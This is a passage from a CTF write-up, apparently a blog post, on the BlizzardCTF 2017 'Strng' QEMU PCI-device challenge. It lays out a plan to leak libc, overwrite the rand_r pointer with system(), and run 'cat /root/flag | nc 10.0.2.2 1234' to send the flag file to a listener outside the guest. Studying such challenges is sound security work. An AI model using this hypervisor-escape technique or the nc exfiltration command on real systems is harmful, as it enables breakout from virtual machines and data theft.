farazsth98/farazsth98.github.io/_posts/2018-05-17-BlizzardCTF-2017-Strng.md

 0x555557e2ca50: 0x0000000000000000      0x00007ffff65268d0    # srand()
 0x555557e2ca60: 0x00007ffff6526f60      0x00007ffff6526f70    # rand(), rand_r()
 {% endhighlight %}

+The plan is to first leak libc by using `strng_pmio_read` and `strng_pmio_write`. `strng_pmio_write` can write the index to be read by the `strng_pmio_read` this way we can leak one of the 3 pointers stored in the emulated PCI Device address space.
+Then we are going to use the `strng_mmio_write` to store the command line we want to execute.
+And then we are going to overwrite the `rand_r` pointer with the address of `system@libc` because its called with the argument we control.
+And finally we are going to call the corrupted `rand_r` pointer.
+The command I chose is `cat /root/flag | nc 10.0.2.2 1234`.

 In my setup I use MacOS to host a vagrant box that runs the QEMU process which emulates the vulnerable PCI Device.
 We can grab the flag from the vagrant box by using a listen nc on the Mac.